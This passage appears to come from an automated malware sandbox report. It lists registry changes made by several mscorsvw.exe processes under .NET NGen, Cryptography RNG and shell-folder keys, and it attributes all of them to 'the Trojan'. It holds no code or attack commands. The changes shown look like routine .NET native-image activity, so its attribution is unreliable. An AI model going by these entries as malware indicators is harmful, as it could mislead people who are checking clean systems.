The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]

The process mscorsvw.exe:2248 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigString" = "ZAP--0000-0000"
"MVID" = "9D 8E 8F 7B 7A E9 50 D8 65 44 54 05 97 83 7B 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ILDependencies" = "44 18 F2 39 EC CB 26 0B 6F 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2644b2e9\635b32a7]
"66" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\2644b2e9\635b32a7]
"66" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 4E 18 4D 84 DF 6C DC 73 FA 06 25 CB D0 8F 59"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2644b2e9\635b32a7]
"66" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "18 1F 17 CB 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]

The process mscorsvw.exe:504 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"LastModTime" = "B2 CC 65 CB 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"MVID" = "AB 6E A2 EF 90 77 0C 78 07 DB 52 DB 59 B5 A1 32"
"Status" = "0"
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2995e574\9\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 D7 85 00 0E 31 79 29 99 13 AB 09 13 CB 92 D5"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\19aba884\767c2dc2]
"68" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "98"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"SIG" = "07 95 68 2E 6D 23 41 45 81 DB 7F 93 51 3C 97 66"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]

The process mscorsvw.exe:2504 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 BB A1 B3 5E A3 6A 25 9F 39 B6 E2 2A E6 D2 6D"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "1E 97 EE CA 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]

The process mscorsvw.exe:2116 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "AC 54 8E CB 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 72 22 1F 87 74 F7 5D 80 27 62 89 A5 65 8B BC"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]

The process mscorsvw.exe:2428 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigMask" = "4361"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"MVID" = "E2 17 82 39 6B BC 18 53 A8 67 A6 33 0D FD 66 7B"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\afa163\1f\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ILDependencies" = "57 8D AB 19 D0 02 1A 29 07 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 93 9A 07 14 89 55 FF 66 0C 4E 5E B8 BC 0E 76"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "101"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]

The process mscorsvw.exe:2440 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 6A A2 4B 83 3A 6C 9C 10 31 76 49 A8 FC EC 1D"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:580 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 64 CE FF 5C 5C E3 71 96 D6 36 FA EB 5A 27 DE"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3588 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 77 56 9C E1 EB F2 2B 64 12 29 38 2F 4E 84 27"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3400 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

